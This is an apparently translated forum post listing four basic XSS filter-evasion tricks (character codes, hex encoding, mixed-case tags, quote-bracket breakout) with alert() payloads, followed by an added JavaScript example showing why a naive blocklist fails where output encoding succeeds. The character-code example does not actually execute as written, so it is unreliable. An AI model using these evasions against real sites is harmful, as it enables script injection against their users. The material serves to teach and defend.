Four very basic bypass methods.

1. Convert to ASCII codes
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41)</script>

2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e

3. Change the letter case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>

4. Add a closing marker ”>
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: ”><script>alert(‘I love F4ck’)</script>
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

The conversion tool used is Firefox's hackbar mozilla addon.
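
Why variants 2 to 4 above get past keyword blocklists, seen from the defending side, as an added example that is not part of the original post: a hypothetical case-sensitive tag-stripping filter that inspects the raw value before the application URL-decodes it, next to decode-then-encode output escaping. The inputs are constructed from the variants above with a harmless body, and all function names are assumptions.

```javascript
// Added example (not from the original post). Constructed inputs reuse the
// variants listed above with a harmless alert('x') body.
const samples = {
  plain:      "<script>alert('x')</script>",
  mixedCase:  "<ScRipt>AleRt('x')</sCRipT>",
  urlEncoded: "%3c%73%63%72%69%70%74%3ealert('x')%3c%2f%73%63%72%69%70%74%3e",
  breakout:   "\"><script>alert('x')</script>",
};

// Hypothetical weak filter: strips the literal lowercase tag from the raw
// request value. The application URL-decodes afterwards (assumption).
function naivePipeline(raw) {
  const filtered = raw.replace(/<\/?script>/g, "");
  return decodeURIComponent(filtered);
}

// Hardened pipeline: decode first, then encode for the HTML output context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function hardenedPipeline(raw) {
  return escapeHtml(decodeURIComponent(raw));
}

// Count HTML metacharacters from user input that reach the page unencoded.
function rawMetachars(fragment) {
  return (fragment.match(/[<>"]/g) || []).length;
}

// For each sample, how many raw metacharacters survive each pipeline.
function report() {
  const rows = {};
  for (const [name, raw] of Object.entries(samples)) {
    rows[name] = {
      naive: rawMetachars(naivePipeline(raw)),
      hardened: rawMetachars(hardenedPipeline(raw)),
    };
  }
  return rows;
}

console.log(report());
```

Only the plain form is stopped by the blocklist; the other three still deliver raw `<`, `>` or `"` to the page, while output encoding leaves none in any case.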